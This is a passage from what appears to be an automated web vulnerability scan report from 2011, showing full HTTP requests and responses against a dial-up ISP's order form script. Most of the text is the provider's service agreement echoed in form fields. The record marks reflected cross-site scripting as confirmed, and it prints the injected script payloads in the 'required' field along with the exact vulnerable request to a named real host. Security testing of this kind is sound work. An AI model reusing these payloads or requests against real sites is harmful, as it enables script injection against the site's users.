d+that+Emails+be+downloaded+each+time+mail+is+%0d%0afetched+and+stored+on+the+server+for+no+longer+than+60+days.+Dialup+4+Less.com+is+not+responsible+for+any+email+that+is+lost.%0d%0a%0d%0aUsing+a+Dialup+4+Less.com+account+for+the+purposes+of+sending+SPAM+is+prohibited.+Tampering+with+%0d%0athe+return+address+or+route+report+on+an+email+message+or+Usenet+newsgroup+is+prohibited.+Anonymous+transmission+of+any+sort+is+prohibited.%0d%0a%0d%0aSPAM+is+defined+as+any+unwanted+and+unsolicited+transmission+of+data+through+email+and+usenet+newsgroups.+It+includes+but+is+not+limited+to%3a+%0d%0aadvertisements+for+goods+or+services%2c+chain+letters+and+multi-level+marketing%2c+off+topic+postings+to+mailing+lists+or+newsgroups%2c+any+message+sent+to+%0d%0amore+than+5+newsgroups+or+3+list+owners.+%0d%0a%0d%0aAny+violations+will+be+considered+a+breach+of+this+agreement+and+will+result+in+the+immediate+cancellation+of+all+services+without+warning.%0d%0a%0d%0a10.+AVAILABILITY+OF+THE+SERVICES%3a+%0d%0aDialup+4+Less.com+may+change+its+POP+numbers+at+any+time.+Dialup+4+Less.com+reserves+the+right+to+direct+Members+to+use+certain+numbers+to+access+the+%0d%0aService+or+to+restrict+use+of+specific+access+numbers.+User+names%2c+passwords+and+email+addresses+are+Dialup+4+Less's+property+and+Dialup+4+Less.com+may+%0d%0aalter+or+replace+them+at+any+time.%0d%0a%0d%0a%0d%0a11.+PRIVACY+POLICY%3a+%0d%0aDialup+4+Less.com+will+not+give+out+your+email+address+and%2for+personal+information+to+any+3rd+party+entity%2c+with+the+exception+that+if+Dialup+4+Less.com+%0d%0ais+acquired%2c+it+may+have+to+provide+this+information+to+the+purchaser+of+the+business+so+they+can+continue+providing+service+to+you.%0d%0a%0d%0a%0d%0a12.+DISCLAIMER+OF+WARRANTIES+and+LIMITATION+OF+LIABILITY.+EXCEPT+FOR+CERTAIN+PRODUCTS+AND+SERVICES+SPECIFICALLY+IDENTIFIED+AS+BEING+OFFERED+BY+DialUp+4+%0d%0aLess.com.+%0d%0aDialup+4+Less.com+does+not+control+any+materials%2c+information%2c+products%2c+or+services+on+the+internet.+The+internet+contains+unedited+materials%2c+some+of+%0d%0awhich+are+sexually+explicit+or+may+be+offensive+to+you.+Dialup+4+Less.com+has+no+control+over+and+accepts+no+responsibility+for+such+materials.+You+%0d%0aassume+full+responsibility+and+risk+for+use+of+the+services+and+the+internet+and+are+solely+responsible+for+evaluating+the+accuracy%2c+completeness%2c+and+%0d%0ausefulness+of+all+services%2c+products%2c+and+other+information%2c+and+the+quality+and+merchantability+of+all+merchandise+provided+through+the+service+or+the+%0d%0ainternet.%0d%0a%0d%0aThe+services+are+provided+on+an+%22as+is%22+and+%22as+available%22+basis.+Dialup+4+Less.com+does+not+warrant+that+the+services+will+be+uninterrupted%2c+%0d%0aerror-free%2c+or+free+of+viruses+or+other+harmful+components.+Dialup+4+Less.com+makes+no+express+warranties+and+waives+all+implied+warranties+including%2c+%0d%0abut+not+limited+to%2c+warranties+of+title%2c+noninfringement%2c+merchantability%2c+and+fitness+for+a+particular+purpose+regarding+any+merchandise%2c+information+%0d%0aor+service+provided+through+Dialup+4+Less.com+or+the+internet+generally.+No+advice+or+information+given+by+Dialup+4+Less.com+or+its+representatives+%0d%0ashall+create+a+warranty.+Dialup+4+Less.com+and+its+employees+are+not+liable+for+any+costs+or+damages+arising+directly+or+indirectly+from+your+use+of+the+%0d%0aservices+or+the+internet+including+any+indirect%2c+incidental%2c+exemplary%2c+multiple%2c+special%2c+punitive%2c+or+consequential+damages.+In+any+event%2c+DialUp+4+%0d%0aLess's+cumulative+liability+to+any+member+for+any+and+all+claims+relating+to+the+use+of+the+services+shall+not+exceed+the+total+amount+of+service+fees+%0d%0apaid+during+a+one+month+period.%0d%0a%0d%0a13.+Indemnification%3a%0d%0aCustomer+agrees+that+it+shall+defend%2c+indemnify%2c+save+and+hold+Dialup+4+Less+harmless+from+any+and+all+demands%2c+liabilities%2c+losses%2c+costs+and+claims%2c+%0d%0aincluding+reasonable+attorney's+fees+asserted+against+Dialup+4+Less.com%2c+its+agents%2c+its+customers%2c+officers+and+employees%2c+that+may+arise+or+result+%0d%0afrom+any+service+provided+or+performed+or+agreed+to+be+performed+or+any+product+sold+by+customer%2c+its+agents%2c+employees+or+assigns.+Customer+agrees+to+%0d%0adefend%2c+indemnify+and+hold+harmless+Dialup+4+Less.com+against+liabilities+arising+out+of%3a+(1)+Any+injury+to+person+or+property+caused+by+any+products+%0d%0asold+or+otherwise+distributed+in+connection+with+Dialup+4+Less's+server%3b+(2)+Any+material+supplied+by+customer+infringing+or+allegedly+infringing+on+the+%0d%0aproprietary+rights+of+a+third+party%3b+(3)+Copyright+infringement+and+(4)+Any+defective+products+sold+to+customer+from+Dialup+4+Less+'s+server.%0d%0a%0d%0a14.+MISCELLANEOUS%3a+%0d%0aThis+Agreement%2c+and+Dialup+4+Less's+other+user+policies+posted+on+Dialup+4+Less's+Web+site+constitute+the+entire+agreement+between+you+and+Dialup+4+Less.com+with+respect+to+your+use+of+the+Services.%0d%0a%0d%0aDialup+4+Less.com+may+revise%2c+amend%2c+or+modify+this+Agreement%2c+and+any+other+user+policies+and+agreements%2c+at+any+time+and+in+any+manner+without+prior+notice.&INITIALS=3

Response

HTTP/1.0 200 OK
Date: Fri, 18 Feb 2011 03:56:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 456
Connection: close
Content-Type: text/html


<html> <head> <title>Error: Invalid Submission</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Invalid Submission</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td><CENTER>The following required field(s) were invalid or blank in your submission form:<p> <ul> <li>'"--></style></script><script>netsparker(0x000A96)</script> </ul> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form <BR> or click <a href="https://secure.hosting4less.com/dialup4less.com/order.html">here</a> for a new blank one. </CENTER> </td></tr> </table> </center> </body></html>
- /dialup4less.com/cgi-bin/order.cgi

/dialup4less.com/cgi-bin/order.cgi CONFIRMED

https://secure.hosting4less.com/dialup4less.com/cgi-bin/order.cgi

Parameters

Parameter Type Value
cour_listfields POST value
cour_top POST Thank you for signing up with Dialup 4 Less.com The following is the information that was filled out on our online order form. You wil be receiving a phone call to verify this order from our company. Please also reply back to this email confirming that the information is correct. Confirmation Info:
html_redirect POST http://www.dialup4less.com/thankyou.html
cour_send POST value
print_blank_fields POST value
required POST '"--></style></script><script>alert(0x000AA9)</script>
cour_bottom POST Thank You for choosing Dialup 4 Less.com. We look forward to providing you with the best service possible. You will be receiving your login information in another email shortly. Be advised, all accounts automatically renew until canceled by faxing or emailing us a cancelation notice prior to renewal date.
cour_close POST Sincerely,
cour_myname POST Dialup 4 Less.com
cour_myemail POST order@dialup4less.com
cour_mywebsite POST http://www.dialup4less.com
mail_subject POST Dialup 4 Less.com Account Sign Up
mail_recipient POST order@dialup4less.com
mail_listfields POST value
env_report POST REMOTE_HOST,REMOTE_ADDR,HTTP_USER_AGENT
DESIREDUSERNAME POST Ronald Smith
DESIREDPASSWORD POST 3
TERM POST PLAN: Vacation Dial-Up - Only 1 Month ($19.95 ($9.95/mo) & $10 SETUP FEE)
NAME POST Ronald Smith
ORGANIZATION POST 3
ADDRESS POST 3
CITY POST 3
STATE POST DE
ZIP POST 3
PHONE POST 3
MOBILE-NUMBER POST 3
FAX POST 3
email POST netsparker@example.com
REPRESENTATIVE POST 3
PROMOTION-CODE POST 3
REFERER POST 3
CARD-HOLDER-NAME POST Ronald Smith
CREDIT-CARD-NUMBER POST 3
Credit+Card+Type POST SelectPlan
CREDIT-CARD-EXPIRATION POST selectmonth
CreditCard+Billing+Address POST 3
billingcity POST 3
billingstate POST 3
CreditCard+Billing+ZipCode POST 3
AGREEMENT POST 1. INTRODUCTION: Dialup 4 Less.com provides its Nationwide Internet Access, as they may exist from time to time ("Services"), to users who pay a quarterly, semi annual or annual service fee to subscribe to the Services ("Members"). By establishing an account, you agree to be bound by this Agreement and to use the Services in compliance with this Agreement, our Acceptable Use Policy and other policies. If you do not agree to the terms and conditions of this Agreement, including any future revisions, we suggest you not use our Services. If you are a current Member, please terminate your use of the Services under Section 6. 2. SUBSCRIPTION REQUIREMENTS: Members must be at least 18 years old. Local access dial-up numbers may not be available in all areas. You are solely responsible for determining if use of a particular dial-up number will cause you to incur long-distance, toll or other charges. Dialup 4 Less.com is not responsible for any long-distance, toll or other telecommunications charges you incur. Current prices for Dialup 4 Less.com Services are posted throughout our website at http://www.dialup4less.com These rates may also be obtained by calling (888) 818-0444 8am to 6pm weekdays, Pacific Standard Time. Dialup 4 Less.com reserves the right to change prices, policies and institute new fees and or policies at any time. 3. PAYMENT OBLIGATIONS OF A MEMBER. A. Members must provide Dialup 4 Less.com with accurate and complete billing information including legal name, address, telephone number, and credit card/billing information. B. Report to Dialup 4 Less.com all changes to this information within five (5) days of the change. Members are responsible for any changes to their account. C. Members having questions regarding charges to an account, should contact Dialup 4 Less's Billing Department at (888) 818-0444 8am to 6pm weekdays Pacific Standard Time. 4. CREDIT CARD ACCOUNTS: All charges are automatically billed to the member's credit card on the day of sign up and the first day of each billing anniversary month from that point on until the account is cancelled. Once an account is set up, all recurring billing will be on the first of the month. regardless of the day they sign up. You will be billed quarterly , semi annual or annual depending on the selection you chose when you signed up. In the event the credit card is declined by your Bank, the customer will be notified by email or phone to the email/phone number on file. Past due accounts that are not brought current within 5 days of the notice are subject to suspension and possible account termination. There will be a $20 Re-Activation Fee on any accounts suspended and then later re-activated. All payments are non-refundable, there are no refunds expressed or implied with this service. The company listed on the credit card statement will be Hosting 4 Less. Dialup 4 Less.com will not be responsible for any charges or expenses (e.g for overdrawn accounts, exceeding credit card limits, etc.) resulting from charges billed by Dialup 4 Less.com. 5. TERM OF AGREEMENT: Continued use of the Services constitutes acceptance of this Agreement and any future versions. If you are dissatisfied with the Services or any related terms, conditions, rules, policies, guidelines, or practices, your sole and exclusive remedy is to discontinue using the Services by terminating your account. 6. CANCELLATION: You may terminate your account at any time and for any reason by providing notice of intent to terminate to Dialup 4 Less.com by: A. Fax: Send a Fax In Writing To Dialup 4 Less.com at (818) 773-8023 With Your UserName & Password. B. Email: billing@dialup4less.com. C. To protect you and for security purposes, all requests for cancellations or changes will require your user name and password. Dialup 4 Less.com may terminate this Agreement, your password, your account, or your use of the Services, for any reason, including, without limitation, if Dialup 4 Less.com, in its sole discretion, believes you have violated this Agreement, our Acceptable Use Policy, or any of the applicable user policies. Dialup 4 Less.com will provide a termination notice to you by: email addressed to your email account. All notices to you shall be deemed effective immediately. Sections 3, 9, 10, and 12 of this Agreement shall survive termination of this Agreement. 7. ACCOUNT, PASSWORD, AND SECURITY: You must keep your password confidential so that no one else may access the Services through your account. Sharing your account is prohibited, your account is for your exclusive use only. You must notify Dialup 4 Less.com immediately upon discovering any unauthorized use of your account. 8. EXTENT OF USE: An "Unlimited" access account does not constitute a dedicated connection. Dialup 4 Less.com intends it to be for an unlimited amount of time "manually" making use of the connection (ie: a individual human being sitting at a computer). This service is intended for reasonable usage. Dialup 4 Less.com employs a 10 minute inactivity timer as well as a 5 hour network cutoff timer to ensure fair access to all customers. Anyone attempting to remain on line continuously by automatically redialing after being disconnected may be cancelled in order to protect our network resources and maintain Service availability for others. 9. EMAIL USE AND SPAM: Email accounts are limited to 50MB in terms of storage. It is suggested that Emails be downloaded each time mail is fetched and stored on the server for no longer than 60 days. Dialup 4 Less.com is not responsible for any email that is lost. Using a Dialup 4 Less.com account for the purposes of sending SPAM is prohibited. Tampering with the return address or route report on an email message or Usenet newsgroup is prohibited. Anonymous transmission of any sort is prohibited. SPAM is defined as any unwanted and unsolicited transmission of data through email and usenet newsgroups. It includes but is not limited to: advertisements for goods or services, chain letters and multi-level marketing, off topic postings to mailing lists or newsgroups, any message sent to more than 5 newsgroups or 3 list owners. Any violations will be considered a breach of this agreement and will result in the immediate cancellation of all services without warning. 10. AVAILABILITY OF THE SERVICES: Dialup 4 Less.com may change its POP numbers at any time. Dialup 4 Less.com reserves the right to direct Members to use certain numbers to access the Service or to restrict use of specific access numbers. User names, passwords and email addresses are Dialup 4 Less's property and Dialup 4 Less.com may alter or replace them at any time. 11. PRIVACY POLICY: Dialup 4 Less.com will not give out your email address and/or personal information to any 3rd party entity, with the exception that if Dialup 4 Less.com is acquired, it may have to provide this information to the purchaser of the business so they can continue providing service to you. 12. DISCLAIMER OF WARRANTIES and LIMITATION OF LIABILITY. EXCEPT FOR CERTAIN PRODUCTS AND SERVICES SPECIFICALLY IDENTIFIED AS BEING OFFERED BY DialUp 4 Less.com. Dialup 4 Less.com does not control any materials, information, products, or services on the internet. The internet contains unedited materials, some of which are sexually explicit or may be offensive to you. Dialup 4 Less.com has no control over and accepts no responsibility for such materials. You assume full responsibility and risk for use of the services and the internet and are solely responsible for evaluating the accuracy, completeness, and usefulness of all services, products, and other information, and the quality and merchantability of all merchandise provided through the service or the internet. The services are provided on an "as is" and "as available" basis. Dialup 4 Less.com does not warrant that the services will be uninterrupted, error-free, or free of viruses or other harmful components. Dialup 4 Less.com makes no express warranties and waives all implied warranties including, but not limited to, warranties of title, noninfringement, merchantability, and fitness for a particular purpose regarding any merchandise, information or service provided through Dialup 4 Less.com or the internet generally. No advice or information given by Dialup 4 Less.com or its representatives shall create a warranty. Dialup 4 Less.com and its employees are not liable for any costs or damages arising directly or indirectly from your use of the services or the internet including any indirect, incidental, exemplary, multiple, special, punitive, or consequential damages. In any event, DialUp 4 Less's cumulative liability to any member for any and all claims relating to the use of the services shall not exceed the total amount of service fees paid during a one month period. 13. Indemnification: Customer agrees that it shall defend, indemnify, save and hold Dialup 4 Less harmless from any and all demands, liabilities, losses, costs and claims, including reasonable attorney's fees asserted against Dialup 4 Less.com, its agents, its customers, officers and employees, that may arise or result from any service provided or performed or agreed to be performed or any product sold by customer, its agents, employees or assigns. Customer agrees to defend, indemnify and hold harmless Dialup 4 Less.com against liabilities arising out of: (1) Any injury to person or property caused by any products sold or otherwise distributed in connection with Dialup 4 Less's server; (2) Any material supplied by customer infringing or allegedly infringing on the proprietary rights of a third party; (3) Copyright infringement and (4) Any defective products sold to customer from Dialup 4 Less 's server. 14. MISCELLANEOUS: This Agreement, and Dialup 4 Less's other user policies posted on Dialup 4 Less's Web site constitute the entire agreement between you and Dialup 4 Less.com with respect to your use of the Services. Dialup 4 Less.com may revise, amend, or modify this Agreement, and any other user policies and agreements, at any time and in any manner without prior notice.
INITIALS POST 3

Request

POST /dialup4less.com/cgi-bin/order.cgi HTTP/1.1
Referer: https://secure.hosting4less.com/dialup4less.com/order.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.hosting4less.com
Content-Length: 12790
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cour_listfields=value&cour_top=Thank+you+for+signing+up+with+Dialup+4+Less.com++The+following+is+%0d%0athe+information+that+was+filled+out+on+our+online+order+form.++You+wil+be+receiving+a+phone+call+to+verify+this+order+from+our+company.%0d%0aPlease+also+reply+back+to+this+email+confirming+that+the+information+is+correct.%0d%0a%0d%0aConfirmation+Info%3a&html_redirect=http%3a%2f%2fwww.dialup4less.com%2fthankyou.html&cour_send=value&print_blank_fields=value&required='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000AA9)%3c%2fscript%3e&cour_bottom=Thank+You+for+choosing+Dialup+4+Less.com.+We+look+forward+to+providing+you+with+the+best+service+possible.++You+will+be+receiving+your+login+%0d%0ainformation+in+another+email+shortly.++Be+advised%2c+all+accounts+automatically+renew+until+canceled+by+faxing+or+emailing+us+a+cancelation+notice+prior+to+renewal+date.&cour_close=Sincerely%2c&cour_myname=Dialup+4+Less.com&cour_myemail=order%40dialup4less.com&cour_mywebsite=http%3a%2f%2fwww.dialup4less.com&mail_subject=Dialup+4+Less.com+Account+Sign+Up&mail_recipient=order%40dialup4less.com&mail_listfields=value&env_report=REMOTE_HOST%2cREMOTE_ADDR%2cHTTP_USER_AGENT&DESIREDUSERNAME=Ronald+Smith&DESIREDPASSWORD=3&TERM=PLAN%3a+Vacation+Dial-Up+-+Only+1+Month+(%2419.95+(%249.95%2fmo)+%26+%2410+SETUP+FEE)&NAME=Ronald+Smith&ORGANIZATION=3&ADDRESS=3&CITY=3&STATE=DE&ZIP=3&PHONE=3&MOBILE-NUMBER=3&FAX=3&email=netsparker%40example.com&REPRESENTATIVE=3&PROMOTION-CODE=3&REFERER=3&CARD-HOLDER-NAME=Ronald+Smith&CREDIT-CARD-NUMBER=3&Credit+Card+Type=SelectPlan&CREDIT-CARD-EXPIRATION=selectmonth&CreditCard+Billing+Address=3&billingcity=3&billingstate=3&CreditCard+Billing+ZipCode=3&AGREEMENT=1.+INTRODUCTION%3a%0d%0aDialup+4+Less.com+provides+its+Nationwide+Internet+Access%2c+as+they+may+exist+from+time+to+time+(%22Services%22)%2c+to+users+%0d%0awho+pay+a+quarterly%2c+semi+annual+or+annual+service+fee+to+subscribe+to+the+Services+(%22Members%22).+By+establishing+an+account%2c+you+agree+to+be+bound+by+this+Agreement+and+to+use+%0d%0athe+Services+in+compliance+with+this+Agreement%2c+our+Acceptable+Use+Policy+and+other+policies.%0d%0a%0d%0aIf+you+do+not+agree+to+the+terms+and+conditions+of+this+Agreement%2c+including+any+future+revisions%2c+we+suggest+you+not+use+our+Services.+If+you+are+a+%0d%0acurrent+Member%2c+please+terminate+your+use+of+the+Services+under+Section+6.%0d%0a%0d%0a2.+SUBSCRIPTION+REQUIREMENTS%3a%0d%0aMembers+must+be+at+least+18+years+old.+Local+access+dial-up+numbers+may+not+be+available+in+all+areas.+You+are+solely+responsible+for+determining+if+use+%0d%0aof+a+particular+dial-up+number+will+cause+you+to+incur+long-distance%2c+toll+or+other+charges.+Dialup+4+Less.com+is+not+responsible+for+any+long-distance%2c+%0d%0atoll+or+other+telecommunications+charges+you+incur.+Current+prices+for+Dialup+4+Less.com+Services+are+posted+throughout+our+website+at+%0d%0ahttp%3a%2f%2fwww.dialup4less.com+These+rates+may+also+be+obtained+by+calling+(888)+818-0444+8am+to+6pm+weekdays%2c+Pacific+Standard+Time.+Dialup+4+Less.com+%0d%0areserves+the+right+to+change+prices%2c+policies+and+institute+new+fees+and+or+policies+at+any+time.%0d%0a%0d%0a3.+PAYMENT+OBLIGATIONS+OF+A+MEMBER.%0d%0aA.+Members+must+provide+Dialup+4+Less.com+with+accurate+and+complete+billing+information+including+legal+name%2c+address%2c+telephone+number%2c+and+credit+%0d%0acard%2fbilling+information.+%0d%0a%0d%0aB.+Report+to+Dialup+4+Less.com+all+changes+to+this+information+within+five+(5)+days+of+the+change.+Members+are+responsible+for+any+changes+to+their+%0d%0aaccount.%0d%0a%0d%0aC.+Members+having+questions+regarding+charges+to+an+account%2c+should+contact+Dialup+4+Less's+Billing+Department+at+(888)+818-0444+8am+to+6pm+weekdays+%0d%0aPacific+Standard+Time.%0d%0a%0d%0a4.+CREDIT+CARD+ACCOUNTS%3a+%0d%0aAll+charges+are+automatically+billed+to+the+member's+credit+card+on+the+day+of+sign+up+and+the+first+day+of+each+billing+anniversary+month+from+that+%0d%0apoint+on+until+the+account+is+cancelled.+Once+an+account+is+set+up%2c+all+recurring+billing+will+be+on+the+first+of+the+month.+regardless+of+the+day+they+sign+up.+You+will+be+billed+%0d%0aquarterly+%2c+semi+annual+or+annual+depending+on+the+selection+you+chose+when+you+signed+up.+In+the+event+the+credit+card+is+declined+by+your+Bank%2c+the+customer+will+be+notified+by+email+or+%0d%0aphone+to+the+email%2fphone+number+on+file.+Past+due+accounts+that+are+not+brought+current+within+5+days+of+the+notice+are+subject+to+suspension+and+possible+account+termination.+There+will+be+a+%0d%0a%2420+Re-Activation+Fee+on+any+accounts+suspended+and+then+later+re-activated.+All+payments+are+non-refundable%2c+there+are+no+refunds+expressed+or+%0d%0aimplied+with+this+service.++The+company+listed+on+the+credit+card+statement+will+be+Hosting+4+Less.+Dialup+4+Less.com+will+not+be+responsible+for+any+%0d%0acharges+or+expenses+(e.g+for+overdrawn+accounts%2c+exceeding+credit+card+limits%2c+etc.)+resulting+from+charges+billed+by+Dialup+4+Less.com.%0d%0a%0d%0a5.+TERM+OF+AGREEMENT%3a+%0d%0aContinued+use+of+the+Services+constitutes+acceptance+of+this+Agreement+and+any+future+versions.+If+you+are+dissatisfied+with+the+Services+or+any+related+%0d%0aterms%2c+conditions%2c+rules%2c+policies%2c+guidelines%2c+or+practices%2c+your+sole+and+exclusive+remedy+is+to+discontinue+using+the+Services+by+terminating+your+%0d%0aaccount.%0d%0a%0d%0a6.+CANCELLATION%3a+%0d%0aYou+may+terminate+your+account+at+any+time+and+for+any+reason+by+providing+notice+of+intent+to+terminate+to+Dialup+4+Less.com+by%3a+%0d%0a%0d%0aA.++Fax%3a++Send+a+Fax+In+Writing+To+Dialup+4+Less.com+at+(818)+773-8023+With+Your+UserName+%26+Password.%0d%0a%0d%0aB.+Email%3a+billing%40dialup4less.com.%0d%0a%0d%0aC.+To+protect+you+and+for+security+purposes%2c+all+requests+for+cancellations+or+changes+will+require+your+user+name+and+password.+Dialup+4+Less.com+may+%0d%0aterminate+this+Agreement%2c+your+password%2c+your+account%2c+or+your+use+of+the+Services%2c+for+any+reason%2c+including%2c+without+limitation%2c+if+Dialup+4+Less.com%2c+%0d%0ain+its+sole+discretion%2c+believes+you+have+violated+this+Agreement%2c+our+Acceptable+Use+Policy%2c+or+any+of+the+applicable+user+policies.+Dialup+4+Less.com+%0d%0awill+provide+a+termination+notice+to+you+by%3a+email+addressed+to+your+email+account.+All+notices+to+you+shall+be+deemed+effective+immediately.+Sections+%0d%0a3%2c+9%2c+10%2c+and+12+of+this+Agreement+shall+survive+termination+of+this+Agreement.%0d%0a%0d%0a7.+ACCOUNT%2c+PASSWORD%2c+AND+SECURITY%3a%0d%0aYou+must+keep+your+password+confidential+so+that+no+one+else+may+access+the+Services+through+your+account.+Sharing+your+account+is+prohibited%2c+your+%0d%0aaccount+is+for+your+exclusive+use+only.+You+must+notify+Dialup+4+Less.com+immediately+upon+discovering+any+unauthorized+use+of+your+account.%0d%0a%0d%0a%0d%0a8.+EXTENT+OF+USE%3a+%0d%0aAn+%22Unlimited%22+access+account+does+not+constitute+a+dedicated+connection.+Dialup+4+Less.com+intends+it+to+be+for+an%0d%0aunlimited+amount+of+time+%22manually%22+making+use+of+the+connection+(ie%3a+a+individual+human+being+sitting+at+a+computer).++This+service+is+intended%0d%0afor+reasonable+usage.++Dialup+4+Less.com+employs+a+10+minute+inactivity+%0d%0atimer+as+well+as+a+5+hour+network+cutoff+timer+to+ensure+fair%0d%0aaccess+to+all+customers.+Anyone+attempting+to+remain+on+line+continuously+by+automatically+redialing+after+being+disconnected+may+be+cancelled+in+order+%0d%0ato+protect+our+network+resources+and+maintain+Service+availability+for+%0d%0aothers.%0d%0a%0d%0a9.+EMAIL+USE+AND+SPAM%3a%0d%0aEmail+accounts+are+limited+to+50MB+in+terms+of+storage.++It+is+suggested+that+Emails+be+downloaded+each+time+mail+is+%0d%0afetched+and+stored+on+the+server+for+no+longer+than+60+days.+Dialup+4+Less.com+is+not+responsible+for+any+email+that+is+lost.%0d%0a%0d%0aUsing+a+Dialup+4+Less.com+account+for+the+purposes+of+sending+SPAM+is+prohibited.+Tampering+with+%0d%0athe+return+address+or+route+report+on+an+email+message+or+Usenet+newsgroup+is+prohibited.+Anonymous+transmission+of+any+sort+is+prohibited.%0d%0a%0d%0aSPAM+is+defined+as+any+unwanted+and+unsolicited+transmission+of+data+through+email+and+usenet+newsgroups.+It+includes+but+is+not+limited+to%3a+%0d%0aadvertisements+for+goods+or+services%2c+chain+letters+and+multi-level+marketing%2c+off+topic+postings+to+mailing+lists+or+newsgroups%2c+any+message+sent+to+%0d%0amore+than+5+newsgroups+or+3+list+owners.+%0d%0a%0d%0aAny+violations+will+be+considered+a+breach+of+this+agreement+and+will+result+in+the+immediate+cancellation+of+all+services+without+warning.%0d%0a%0d%0a10.+AVAILABILITY+OF+THE+SERVICES%3a+%0d%0aDialup+4+Less.com+may+change+its+POP+numbers+at+any+time.+Dialup+4+Less.com+reserves+the+right+to+direct+Members+to+use+certain+numbers+to+access+the+%0d%0aService+or+to+restrict+use+of+specific+access+numbers.+User+names%2c+passwords+and+email+addresses+are+Dialup+4+Less's+property+and+Dialup+4+Less.com+may+%0d%0aalter+or+replace+them+at+any+time.%0d%0a%0d%0a%0d%0a11.+PRIVACY+POLICY%3a+%0d%0aDialup+4+Less.com+will+not+give+out+your+email+address+and%2for+personal+information+to+any+3rd+party+entity%2c+with+the+exception+that+if+Dialup+4+Less.com+%0d%0ais+acquired%2c+it+may+have+to+provide+this+information+to+the+purchaser+of+the+business+so+they+can+continue+providing+service+to+you.%0d%0a%0d%0a%0d%0a12.+DISCLAIMER+OF+WARRANTIES+and+LIMITATION+OF+LIABILITY.+EXCEPT+FOR+CERTAIN+PRODUCTS+AND+SERVICES+SPECIFICALLY+IDENTIFIED+AS+BEING+OFFERED+BY+DialUp+4+%0d%0aLess.com.+%0d%0aDialup+4+Less.com+does+not+control+any+materials%2c+information%2c+products%2c+or+services+on+the+internet.+The+internet+contains+unedited+materials%2c+some+of+%0d%0awhich+are+sexually+explicit+or+may+be+offensive+to+you.+Dialup+4+Less.com+has+no+control+over+and+accepts+no+responsibility+for+such+materials.+You+%0d%0aassume+full+responsibility+and+risk+for+use+of+the+services+and+the+internet+and+are+solely+responsible+for+evaluating+the+accuracy%2c+completeness%2c+and+%0d%0ausefulness+of+all+services%2c+products%2c+and+other+information%2c+and+the+quality+and+merchantability+of+all+merchandise+provided+through+the+service+or+the+%0d%0ainternet.%0d%0a%0d%0aThe+services+are+provided+on+an+%22as+is%22+and+%22as+available%22+basis.+Dialup+4+Less.com+does+not+warrant+that+the+services+will+be+uninterrupted%2c+%0d%0aerror-free%2c+or+free+of+viruses+or+other+harmful+components.+Dialup+4+Less.com+makes+no+express+warranties+and+waives+all+implied+warranties+including%2c+%0d%0abut+not+limited+to%2c+warranties+of+title%2c+noninfringement%2c+merchantability%2c+and+fitness+for+a+particular+purpose+regarding+any+merchandise%2c+information+%0d%0aor+service+provided+through+Dialup+4+Less.com+or+the+internet+generally.+No+advice+or+information+given+by+Dialup+4+Less.com+or+its+representatives+%0d%0ashall+create+a+warranty.+Dialup+4+Less.com+and+its+employees+are+not+liable+for+any+costs+or+damages+arising+directly+or+indirectly+from+your+use+of+the+%0d%0aservices+or+the+internet+including+any+indirect%2c+incidental%2c+exemplary%2c+multiple%2c+special%2c+punitive%2c+or+consequential+damages.+In+any+event%2c+DialUp+4+%0d%0aLess's+cumulative+liability+to+any+member+for+any+and+all+claims+relating+to+the+use+of+the+services+shall+not+exceed+the+total+amount+of+service+fees+%0d%0apaid+during+a+one+month+period.%0d%0a%0d%0a13.+Indemnification%3a%0d%0aCustomer+agrees+that+it+shall+defend%2c+indemnify%2c+save+and+hold+Dialup+4+Less+harmless+from+any+and+all+demands%2c+liabilities%2c+losses%2c+costs+and+claims%2c+%0d%0aincluding+reasonable+attorney's+fees+asserted+against+Dialup+4+Less.com%2c+its+agents%2c+its+customers%2c+officers+and+employees%2c+that+may+arise+or+result+%0d%0afrom+any+service+provided+or+performed+or+agreed+to+be+performed+or+any+product+sold+by+customer%2c+its+agents%2c+employees+or+assigns.+Customer+agrees+to+%0d%0adefend%2c+indemnify+and+hold+harmless+Dialup+4+Less.com+against+liabilities+arising+out+of%3a+(1)+Any+injury+to+person+or+property+caused+by+any+products+%0d%0asold+or+otherwise+distributed+in+connection+with+Dialup+4+Less's+server%3b+(2)+Any+material+supplied+by+customer+infringing+or+allegedly+infringing+on+the+%0d%0aproprietary+rights+of+a+third+party%3b+(3)+Copyright+infringement+and+(4)+Any+defective+products+sold+to+customer+from+Dialup+4+Less+'s+server.%0d%0a%0d%0a14.+MISCELLANEOUS%3a+%0d%0aThis+Agreement%2c+and+Dialup+4+Less's+other+user+policies+posted+on+Dialup+4+Less's+Web+site+constitute+the+entire+agreement+between+you+and+Dialup+4+Less.com+with+respect+to+your+use+of+the+Services.%0d%0a%0d%0aDialup+4+Less.com+may+revise%2c+amend%2c+or+modify+this+Agreement%2c+and+any+other+user+policies+and+agreements%2c+at+any+time+and+in+any+manner+without+prior+notice.&INITIALS=3

Response

HTTP/1.0 200 OK
Date: Fri, 18 Feb 2011 03:57:53 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 456
Connection: close
Content-Type: text/html


<html> <head> <title>Error: Invalid Submission</title> </head> <center> <table border=0 width=600 bgcolor=#9C9C9C> <tr><th><font size=+2>Error: Invalid Submission</font></th></tr> </table> <table border=0 width=600 bgcolor=#CFCFCF> <tr><td><CENTER>The following required field(s) were invalid or blank in your submission form:<p> <ul> <li>'"--></style></script><script>netsparker(0x000AA9)</script> </ul> These fields must be filled in before you can successfully submit the form.<p> Please use your browser's back button to return to the form <BR> or click <a href="https://secure.hosting4less.com/dialup4less.com/order.html">here</a> for a new blank one. </CENTER> </td></tr> </table> </center> </body></html>
- /dialup4less.com/cgi-bin/order.cgi

/dialup4less.com/cgi-bin/order.cgi CONFIRMED

https://secure.hosting4less.com/dialup4less.com/cgi-bin/order.cgi

Parameters

Parameter Type Value
cour_listfields POST value
cour_top POST Thank you for signing up with Dialup 4 Less.com The following is the information that was filled out on our online order form. You wil be receiving a phone call to verify this order from our company. Please also reply back to this email confirming that the information is correct. Confirmation Info:
